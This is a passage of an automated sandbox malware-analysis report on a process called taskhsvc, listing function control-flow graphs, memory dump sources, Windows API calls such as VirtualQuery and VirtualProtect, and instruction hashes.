                                                            control_flow_graph 381 6cd726d0-6cd7273e fwrite vfprintf abort 383 6cd72744-6cd7274f 381->383 384 6cd7281d-6cd7281f 381->384 387 6cd72750-6cd72754 383->387 385 6cd7276e-6cd7277c call 6cd73090 384->385 386 6cd7285a-6cd72877 call 6cd726d0 384->386 385->386 396 6cd72782-6cd727cb call 6cd731c0 VirtualQuery 385->396 398 6cd72880-6cd728d2 call 6cd73110 call 6cd73320 386->398 399 6cd72879 386->399 390 6cd72756-6cd7275e 387->390 391 6cd72764-6cd7276c 387->391 390->391 394 6cd72816-6cd7281c 390->394 391->385 391->387 402 6cd727cd-6cd727d7 396->402 403 6cd7283a-6cd72855 call 6cd726d0 396->403 412 6cd72973-6cd7297a 398->412 413 6cd728d8-6cd728db 398->413 405 6cd7280f 402->405 406 6cd727d9-6cd727df 402->406 403->386 405->394 406->405 409 6cd727e1-6cd7280d VirtualProtect 406->409 409->405 411 6cd72824-6cd72835 GetLastError call 6cd726d0 409->411 411->403 415 6cd728e1-6cd728e8 413->415 416 6cd72a40 413->416 418 6cd728ee-6cd728f5 415->418 419 6cd7297b 415->419 417 6cd72a45-6cd72a49 416->417 420 6cd72980-6cd72986 417->420 421 6cd72a4f-6cd72a54 417->421 418->419 422 6cd728fb-6cd72908 418->422 419->420 420->412 426 6cd72988-6cd72989 420->426 424 6cd72913-6cd72919 421->424 425 6cd72a5a 421->425 422->417 423 6cd7290e 422->423 423->424 427 6cd7291f-6cd72928 424->427 428 6cd72b0b-6cd72b29 call 6cd726d0 424->428 425->420 429 6cd72990-6cd729b5 call 6cd72730 426->429 427->412 430 6cd7292a-6cd7294b 427->430 439 6cd72b2b-6cd72b2e 428->439 440 6cd72b4a 428->440 442 6cd729b7-6cd729c0 429->442 433 6cd72951-6cd72954 430->433 434 6cd72a5f-6cd72a8d call 6cd72730 430->434 437 6cd72acf-6cd72ae4 call 6cd72730 433->437 438 6cd7295a-6cd7295d 433->438 454 6cd72a94-6cd72a9d 434->454 437->454 446 6cd72963-6cd7296e call 6cd726d0 438->446 447 6cd72aa8-6cd72acd call 6cd72730 438->447 448 6cd72b30-6cd72b45 439->448 443 6cd729c2 442->443 444 6cd729cf-6cd729e4 442->444 443->412 450 6cd729e6-6cd72a06 VirtualQuery 444->450 451 6cd729c4-6cd729cd 444->451 446->412 447->454 462 6cd72b47 448->462 457 6cd72ae6-6cd72b06 call 6cd726d0 450->457 458 6cd72a0c-6cd72a35 VirtualProtect 450->458 451->412 451->444 454->430 460 6cd72aa3 454->460 457->428 458->451 460->442 462->440
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            • Associated: 00000056.00000002.3023161276.000000006CD60000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023343760.000000006CD6D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023521855.000000006CD73000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023571526.000000006CD75000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023653880.000000006CD7C000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023693853.000000006CD7D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023790951.000000006CD81000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                            • String ID: @
                                                            • API String ID: 1503958624-2766056989
                                                            • Opcode ID: 097077d15b2a6ed6364c2015db4457342c82d3f54e497143e395ffd648a9f9dd
                                                            • Instruction ID: 97f385aaaa48f48ab677d68919d4a2442712f87795290141dd67661b8b118e1e
                                                            • Opcode Fuzzy Hash: 097077d15b2a6ed6364c2015db4457342c82d3f54e497143e395ffd648a9f9dd
                                                            • Instruction Fuzzy Hash: DF413AB2904315DFEB21EF28C58865ABBF4FB45358F40891DE99897760E730E844CB72
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CDDFD60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 463 6cddfd60-6cddfdce fwrite vfprintf abort 465 6cddfead-6cddfeaf 463->465 466 6cddfdd4-6cddfddf 463->466 467 6cddfdfe-6cddfe0c call 6cde0720 465->467 468 6cddfde0-6cddfde4 466->468 474 6cddfeea-6cddff07 call 6cddfd60 467->474 475 6cddfe12-6cddfe5b call 6cde0850 VirtualQuery 467->475 469 6cddfdf4-6cddfdfc 468->469 470 6cddfde6-6cddfdee 468->470 469->467 469->468 470->469 472 6cddfea6-6cddfeac 470->472 484 6cddff09 474->484 485 6cddff10-6cddff62 call 6cde07a0 call 6cde09c0 474->485 481 6cddfe5d-6cddfe67 475->481 482 6cddfeca-6cddfee1 475->482 486 6cddfe9f 481->486 487 6cddfe69-6cddfe6f 481->487 482->474 483 6cddfee5 call 6cddfd60 482->483 483->474 495 6cddff68-6cddff6b 485->495 496 6cde0003-6cde000a 485->496 486->472 487->486 489 6cddfe71-6cddfe9d VirtualProtect 487->489 489->486 491 6cddfeb4-6cddfec5 GetLastError call 6cddfd60 489->491 491->482 497 6cddff71-6cddff78 495->497 498 6cde00d0 495->498 499 6cddff7e-6cddff85 497->499 500 6cde000b 497->500 501 6cde00d5-6cde00d9 498->501 499->500 502 6cddff8b-6cddff98 499->502 503 6cde0010-6cde0016 500->503 501->503 504 6cde00df-6cde00e4 501->504 502->501 505 6cddff9e 502->505 503->496 506 6cde0018-6cde0019 503->506 507 6cde00ea 504->507 508 6cddffa3-6cddffa9 504->508 505->508 511 6cde0020-6cde0045 call 6cddfdc0 506->511 507->503 509 6cddffaf-6cddffb8 508->509 510 6cde019b-6cde01b9 call 6cddfd60 508->510 509->496 512 6cddffba-6cddffdb 509->512 521 6cde01da 510->521 522 6cde01bb-6cde01be 510->522 523 6cde0047-6cde0050 511->523 515 6cde00ef-6cde011d call 6cddfdc0 512->515 516 6cddffe1-6cddffe4 512->516 536 6cde0124-6cde012d 515->536 519 6cde015f-6cde0174 call 6cddfdc0 516->519 520 6cddffea-6cddffed 516->520 519->536 526 6cde0138-6cde015d call 6cddfdc0 520->526 527 6cddfff3-6cddfff7 520->527 528 6cde01c0-6cde01d5 522->528 529 6cde005f-6cde0074 523->529 530 6cde0052 523->530 526->536 527->496 535 6cddfffe call 6cddfd60 527->535 544 6cde01d7 528->544 533 6cde0076-6cde0096 VirtualQuery 529->533 534 6cde0054-6cde005d 529->534 530->496 539 6cde009c-6cde00c5 VirtualProtect 533->539 540 6cde0176-6cde0196 call 6cddfd60 533->540 534->496 534->529 535->496 536->512 542 6cde0133 536->542 539->498 539->534 540->510 542->523 544->521
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3024614703.000000006CDDF000.00000080.00000001.01000000.00000010.sdmp, Offset: 6CD90000, based on PE: true
                                                            • Associated: 00000056.00000002.3023841714.000000006CD90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023887330.000000006CD91000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024463758.000000006CDD9000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024551715.000000006CDDA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024678605.000000006CDE1000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024722441.000000006CDE2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024765426.000000006CDE4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024900460.000000006CDF2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024956621.000000006CDF3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025050954.000000006CDF6000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025101418.000000006CDF7000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025101418.000000006CDFC000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025204010.000000006CDFD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd90000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                            • String ID: @
                                                            • API String ID: 1503958624-2766056989
                                                            • Opcode ID: a67f869c81b19a6d96042bee9db194bcf48337035429a615d63ff30659eb0a95
                                                            • Instruction ID: 9b17b62f6d7e5f04e2d0cc3a6c2a6bb9b63c025516dec837d5bc673fb856f78b
                                                            • Opcode Fuzzy Hash: a67f869c81b19a6d96042bee9db194bcf48337035429a615d63ff30659eb0a95
                                                            • Instruction Fuzzy Hash: B94129B2A05341DFE710DF68D98864ABBF4FB49358F45891DE9A8D7720E730E844CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CD6C8E0 Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 627 6cd6c8e0-6cd6c908 malloc 628 6cd6c90e-6cd6c919 627->628 629 6cd6c9ba-6cd6c9bf 627->629 632 6cd6c920-6cd6c92d 628->632 630 6cd6c9c1-6cd6c9d9 629->630 631 6cd6c9dc-6cd6c9de 629->631 630->631 633 6cd6c9e4-6cd6ca08 memcpy 631->633 634 6cd6d965-6cd6d985 memcpy 631->634 635 6cd6c933-6cd6c93d 632->635 636 6cd6e711-6cd6e71a __stack_chk_fail 632->636 637 6cd6d9b1-6cd6d9d0 memcpy 633->637 638 6cd6ca0e-6cd6ca1b 633->638 640 6cd6d9a5 634->640 637->636 638->640 641 6cd6ca21-6cd6ca26 638->641 640->637 642 6cd6ca30-6cd6ca50 641->642 643 6cd6ca28-6cd6ca2d 641->643 644 6cd6ca87-6cd6ca9a 642->644 645 6cd6ca52-6cd6ca54 642->645 643->642 647 6cd6d890-6cd6d893 644->647 648 6cd6caa0-6cd6caa3 644->648 645->644 646 6cd6ca56-6cd6ca66 645->646 649 6cd6d930-6cd6d941 adler32 646->649 650 6cd6ca6c-6cd6ca84 crc32 646->650 647->649 651 6cd6caa5-6cd6caaa 648->651 652 6cd6caac 648->652 650->644 651->652 653 6cd6cab1-6cd6cabc 651->653 652->653 654 6cd6cabe-6cd6cac7 653->654 655 6cd6cacd-6cd6cadb 653->655 654->632 654->655
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            • Associated: 00000056.00000002.3023161276.000000006CD60000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023343760.000000006CD6D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023521855.000000006CD73000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023571526.000000006CD75000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023653880.000000006CD7C000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023693853.000000006CD7D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023790951.000000006CD81000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_failcrc32mallocmemcpy
                                                            • String ID:
                                                            • API String ID: 1129898061-0
                                                            • Opcode ID: 30a543cdcf1374a398516372fa30d787fc9e825dbee1d4001e7f189a23a9be72
                                                            • Instruction ID: f853ae910e3c212081b94574d0295954ab4a67ee0c1c967dda57174f1a93aec7
                                                            • Opcode Fuzzy Hash: 30a543cdcf1374a398516372fa30d787fc9e825dbee1d4001e7f189a23a9be72
                                                            • Instruction Fuzzy Hash: AB5113B5A18701CFC750DF3AC5C061ABBE0BB88358F548A2DE89A87F60D730E844CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF94AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 818 6cf94ae0-6cf94aee 819 6cf94bcd-6cf94bcf 818->819 820 6cf94af4-6cf94aff 818->820 821 6cf94b1e-6cf94b2c call 6cf95440 819->821 822 6cf94b00-6cf94b04 820->822 828 6cf94c0a-6cf94c27 call 6cf94a80 821->828 829 6cf94b32-6cf94b7b call 6cf95570 VirtualQuery 821->829 823 6cf94b14-6cf94b1c 822->823 824 6cf94b06-6cf94b0e 822->824 823->821 823->822 824->823 826 6cf94bc6-6cf94bcc 824->826 839 6cf94c29 828->839 840 6cf94c30-6cf94c82 call 6cf954c0 call 6cf956e0 828->840 834 6cf94bea-6cf94c01 829->834 835 6cf94b7d-6cf94b87 829->835 834->828 841 6cf94c05 call 6cf94a80 834->841 837 6cf94b89-6cf94b8f 835->837 838 6cf94bbf 835->838 837->838 842 6cf94b91-6cf94bbd VirtualProtect 837->842 838->826 849 6cf94c88-6cf94c8b 840->849 850 6cf94d23-6cf94d2a 840->850 841->828 842->838 844 6cf94bd4-6cf94be5 GetLastError call 6cf94a80 842->844 844->834 851 6cf94c91-6cf94c98 849->851 852 6cf94df0 849->852 854 6cf94d2b 851->854 855 6cf94c9e-6cf94ca5 851->855 853 6cf94df5-6cf94df9 852->853 856 6cf94dff-6cf94e04 853->856 857 6cf94d30-6cf94d36 853->857 854->857 855->854 858 6cf94cab-6cf94cb8 855->858 860 6cf94e0a 856->860 861 6cf94cc3-6cf94cc9 856->861 857->850 862 6cf94d38-6cf94d39 857->862 858->853 859 6cf94cbe 858->859 859->861 860->857 863 6cf94ebb-6cf94ed9 call 6cf94a80 861->863 864 6cf94ccf-6cf94cd8 861->864 865 6cf94d40-6cf94d65 call 6cf94ae0 862->865 875 6cf94edb-6cf94ede 863->875 876 6cf94efa 863->876 864->850 866 6cf94cda-6cf94cfb 864->866 878 6cf94d67-6cf94d70 865->878 869 6cf94e0f-6cf94e3d call 6cf94ae0 866->869 870 6cf94d01-6cf94d04 866->870 890 6cf94e44-6cf94e4d 869->890 873 6cf94d0a-6cf94d0d 870->873 874 6cf94e7f-6cf94e94 call 6cf94ae0 870->874 882 6cf94e58-6cf94e7d call 6cf94ae0 873->882 883 6cf94d13-6cf94d1e call 6cf94a80 873->883 874->890 884 6cf94ee0-6cf94ef5 875->884 879 6cf94d7f-6cf94d94 878->879 880 6cf94d72 878->880 886 6cf94d74-6cf94d7d 879->886 887 6cf94d96-6cf94db6 VirtualQuery 879->887 880->850 882->890 883->850 898 6cf94ef7 884->898 886->850 886->879 893 6cf94dbc-6cf94de5 VirtualProtect 887->893 894 6cf94e96-6cf94eb6 call 6cf94a80 887->894 890->866 896 6cf94e53 890->896 893->886 894->863 896->878 898->876
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery
                                                            • String ID: @
                                                            • API String ID: 1027372294-2766056989
                                                            • Opcode ID: b51ec65193deb8d68307989712ee843a30aa9026fcf9815b8edf6762201042ff
                                                            • Instruction ID: df83cb420dd32cc3235a13465591ed65d7518cc4eb89a9162ab3da5afa850130
                                                            • Opcode Fuzzy Hash: b51ec65193deb8d68307989712ee843a30aa9026fcf9815b8edf6762201042ff
                                                            • Instruction Fuzzy Hash: 4E316DB2A053018FEB14DF68D48471AFBF4FB56758F558A18E8A897B04E730E944CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CD72730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 656 6cd72730-6cd7273e 657 6cd72744-6cd7274f 656->657 658 6cd7281d-6cd7281f 656->658 661 6cd72750-6cd72754 657->661 659 6cd7276e-6cd7277c call 6cd73090 658->659 660 6cd7285a-6cd72877 call 6cd726d0 658->660 659->660 670 6cd72782-6cd727cb call 6cd731c0 VirtualQuery 659->670 672 6cd72880-6cd728d2 call 6cd73110 call 6cd73320 660->672 673 6cd72879 660->673 664 6cd72756-6cd7275e 661->664 665 6cd72764-6cd7276c 661->665 664->665 668 6cd72816-6cd7281c 664->668 665->659 665->661 676 6cd727cd-6cd727d7 670->676 677 6cd7283a-6cd72855 call 6cd726d0 670->677 686 6cd72973-6cd7297a 672->686 687 6cd728d8-6cd728db 672->687 679 6cd7280f 676->679 680 6cd727d9-6cd727df 676->680 677->660 679->668 680->679 683 6cd727e1-6cd7280d VirtualProtect 680->683 683->679 685 6cd72824-6cd72835 GetLastError call 6cd726d0 683->685 685->677 689 6cd728e1-6cd728e8 687->689 690 6cd72a40 687->690 692 6cd728ee-6cd728f5 689->692 693 6cd7297b 689->693 691 6cd72a45-6cd72a49 690->691 694 6cd72980-6cd72986 691->694 695 6cd72a4f-6cd72a54 691->695 692->693 696 6cd728fb-6cd72908 692->696 693->694 694->686 700 6cd72988-6cd72989 694->700 698 6cd72913-6cd72919 695->698 699 6cd72a5a 695->699 696->691 697 6cd7290e 696->697 697->698 701 6cd7291f-6cd72928 698->701 702 6cd72b0b-6cd72b29 call 6cd726d0 698->702 699->694 703 6cd72990-6cd729b5 call 6cd72730 700->703 701->686 704 6cd7292a-6cd7294b 701->704 713 6cd72b2b-6cd72b2e 702->713 714 6cd72b4a 702->714 716 6cd729b7-6cd729c0 703->716 707 6cd72951-6cd72954 704->707 708 6cd72a5f-6cd72a8d call 6cd72730 704->708 711 6cd72acf-6cd72ae4 call 6cd72730 707->711 712 6cd7295a-6cd7295d 707->712 728 6cd72a94-6cd72a9d 708->728 711->728 720 6cd72963-6cd7296e call 6cd726d0 712->720 721 6cd72aa8-6cd72acd call 6cd72730 712->721 722 6cd72b30-6cd72b45 713->722 717 6cd729c2 716->717 718 6cd729cf-6cd729e4 716->718 717->686 724 6cd729e6-6cd72a06 VirtualQuery 718->724 725 6cd729c4-6cd729cd 718->725 720->686 721->728 736 6cd72b47 722->736 731 6cd72ae6-6cd72b06 call 6cd726d0 724->731 732 6cd72a0c-6cd72a35 VirtualProtect 724->732 725->686 725->718 728->704 734 6cd72aa3 728->734 731->702 732->725 734->716 736->714
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            • Associated: 00000056.00000002.3023161276.000000006CD60000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023343760.000000006CD6D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023521855.000000006CD73000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023571526.000000006CD75000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023653880.000000006CD7C000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023693853.000000006CD7D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023790951.000000006CD81000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery
                                                            • String ID: @
                                                            • API String ID: 1027372294-2766056989
                                                            • Opcode ID: f063003a14ef1a7a8e0f1860589cf2f6faf2589fad3cb58a1488071f1767a35c
                                                            • Instruction ID: 8cc8082bcc5e655da0f3b2b8b4b9d9cf18ebbee9c5fa85ce10240978a98262f1
                                                            • Opcode Fuzzy Hash: f063003a14ef1a7a8e0f1860589cf2f6faf2589fad3cb58a1488071f1767a35c
                                                            • Instruction Fuzzy Hash: 3E317CB2A04311CBE721DF28C58875AFBF4FB45318F44891DD9A897664E730E804CBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CDDFDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 737 6cddfdc0-6cddfdce 738 6cddfead-6cddfeaf 737->738 739 6cddfdd4-6cddfddf 737->739 740 6cddfdfe-6cddfe0c call 6cde0720 738->740 741 6cddfde0-6cddfde4 739->741 747 6cddfeea-6cddff07 call 6cddfd60 740->747 748 6cddfe12-6cddfe5b call 6cde0850 VirtualQuery 740->748 742 6cddfdf4-6cddfdfc 741->742 743 6cddfde6-6cddfdee 741->743 742->740 742->741 743->742 745 6cddfea6-6cddfeac 743->745 757 6cddff09 747->757 758 6cddff10-6cddff62 call 6cde07a0 call 6cde09c0 747->758 754 6cddfe5d-6cddfe67 748->754 755 6cddfeca-6cddfee1 748->755 759 6cddfe9f 754->759 760 6cddfe69-6cddfe6f 754->760 755->747 756 6cddfee5 call 6cddfd60 755->756 756->747 768 6cddff68-6cddff6b 758->768 769 6cde0003-6cde000a 758->769 759->745 760->759 762 6cddfe71-6cddfe9d VirtualProtect 760->762 762->759 764 6cddfeb4-6cddfec5 GetLastError call 6cddfd60 762->764 764->755 770 6cddff71-6cddff78 768->770 771 6cde00d0 768->771 772 6cddff7e-6cddff85 770->772 773 6cde000b 770->773 774 6cde00d5-6cde00d9 771->774 772->773 775 6cddff8b-6cddff98 772->775 776 6cde0010-6cde0016 773->776 774->776 777 6cde00df-6cde00e4 774->777 775->774 778 6cddff9e 775->778 776->769 779 6cde0018-6cde0019 776->779 780 6cde00ea 777->780 781 6cddffa3-6cddffa9 777->781 778->781 784 6cde0020-6cde0045 call 6cddfdc0 779->784 780->776 782 6cddffaf-6cddffb8 781->782 783 6cde019b-6cde01b9 call 6cddfd60 781->783 782->769 785 6cddffba-6cddffdb 782->785 794 6cde01da 783->794 795 6cde01bb-6cde01be 783->795 796 6cde0047-6cde0050 784->796 788 6cde00ef-6cde011d call 6cddfdc0 785->788 789 6cddffe1-6cddffe4 785->789 809 6cde0124-6cde012d 788->809 792 6cde015f-6cde0174 call 6cddfdc0 789->792 793 6cddffea-6cddffed 789->793 792->809 799 6cde0138-6cde015d call 6cddfdc0 793->799 800 6cddfff3-6cddfff7 793->800 801 6cde01c0-6cde01d5 795->801 802 6cde005f-6cde0074 796->802 803 6cde0052 796->803 799->809 800->769 808 6cddfffe call 6cddfd60 800->808 817 6cde01d7 801->817 806 6cde0076-6cde0096 VirtualQuery 802->806 807 6cde0054-6cde005d 802->807 803->769 812 6cde009c-6cde00c5 VirtualProtect 806->812 813 6cde0176-6cde0196 call 6cddfd60 806->813 807->769 807->802 808->769 809->785 815 6cde0133 809->815 812->771 812->807 813->783 815->796 817->794
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3024614703.000000006CDDF000.00000080.00000001.01000000.00000010.sdmp, Offset: 6CD90000, based on PE: true
                                                            • Associated: 00000056.00000002.3023841714.000000006CD90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023887330.000000006CD91000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024463758.000000006CDD9000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024551715.000000006CDDA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024678605.000000006CDE1000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024722441.000000006CDE2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024765426.000000006CDE4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024900460.000000006CDF2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024956621.000000006CDF3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025050954.000000006CDF6000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025101418.000000006CDF7000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025101418.000000006CDFC000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025204010.000000006CDFD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd90000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery
                                                            • String ID: @
                                                            • API String ID: 1027372294-2766056989
                                                            • Opcode ID: 9989034b0a96599da0903b7fcf17df6bd38f5e90b6c6f2bfcfcfb66b98d428a4
                                                            • Instruction ID: 053cca96fc136c56399eda01df25ba627f6be8a4345c632188e354ca5392d367
                                                            • Opcode Fuzzy Hash: 9989034b0a96599da0903b7fcf17df6bd38f5e90b6c6f2bfcfcfb66b98d428a4
